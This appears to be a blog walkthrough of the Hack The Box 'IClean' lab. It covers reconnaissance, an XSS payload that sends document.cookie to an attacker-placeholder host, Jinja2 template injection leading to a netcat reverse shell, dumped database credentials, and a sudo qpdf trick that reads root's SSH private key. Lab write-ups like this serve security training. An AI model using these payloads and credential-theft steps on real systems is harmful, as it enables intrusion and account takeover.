Hack The Box - IClean

07 May 2024 . tech . Comments
#tutorial

Reconnaissance and Initial Steps

Nmap

sudo nmap -Pn -A 10.10.11.12

echo "10.10.11.12 iclean.htb" | sudo tee -a /etc/hosts

when i navigate to http://iclean.htb it redirect to http://capiclean.htb so I added that to /etc/hosts and access

echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://capiclean.htb/FUZZ" --hc 404 --hl 348

I found a quote directory, let’s have a look.

I fired up burp suite and capture the requests and tested various input vectors and payloads. and I identified a potential vulnerability that could be exploited further.

first I started python3 http server

python3 -m http.server 1234

then put the below payload in the service paratmeter and encoded the payload string by using Ctrl+U and send the request.

<img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>

Then after sometime I get the Cookie. Yooo!

let’s store this cookie using cookie-editor and access the /dashboard.

Visit http://capiclean.htb/InvoiceGenerator to generate an ID and fill it in casually. The ID generated here is # 3873147880

Then visit http://capiclean.htb/QRGenerator, fill in the above ID, and a QR code image link will be generated.

and let’s use Burpsuite to captures request.

Web Exploitation :

During all this Request you will get a POST Request on /QRGenerator which is likely Vulnerable to SSTI because as it is a Flask Application it is running Jinja Template in Background.

To test it I put Basic Payload in qr_link Parameter → `` and Boom I get 49 in Response

I attempted to exploit further to achieve Remote Code Execution (RCE). However, I discovered that the typical Jinja2 Server-Side Template Injection (SSTI) payload was ineffective. then i found this article and it help to find a bypass payload.

https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/

so first thing i started a netcat listener

nc -nlvp 4444

then put the payload in the qr_link parameter and use Ctrl+u encode it and then send the request.

We able to obtain a shell as www-data.

User Flag

After traversing directories and examining files, I identified the app.py file, which inadvertently exposes the MySQL database credentials. Leveraging this discovery, I successfully gained access to the database.

db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

before accessing mysql let’s harden the shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

now let’s access the mysql:

mysql -h 127.0.0.1 -u iclean -p capiclean

show tables;
select * from users;

Enter the password that we found.

Let’s use Cracksation to crack the hashes. https://crackstation.net/

so let’s use this credential to login as user consuela

su consuela

Root Flag

sudo -l

So I can ran qpdf Command. So after searching in Google I found this documentation. https://qpdf.readthedocs.io/en/stable/cli.html

First, utilize the -empty parameter to create an empty document. Next, employ the -qdf parameter to generate a PDF file in QDF mode. Then, utilize the -add-attachment parameter to append a file as an attachment to the PDF. This time, employ the root’s id_rsa, and name the generated file id_rsa.pdf.

let’s run this command:

sudo /usr/bin/qpdf --empty --qdf --add-attachment /root/.ssh/id_rsa -- id_rsa.pdf

and it generated id_rsa.pdf let’s cat that.

let’s creat the id_rsa file and granting the required privileges with chmod 600 id_rsa, I used SSH with the -i option to specify the private key and connect to the server

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.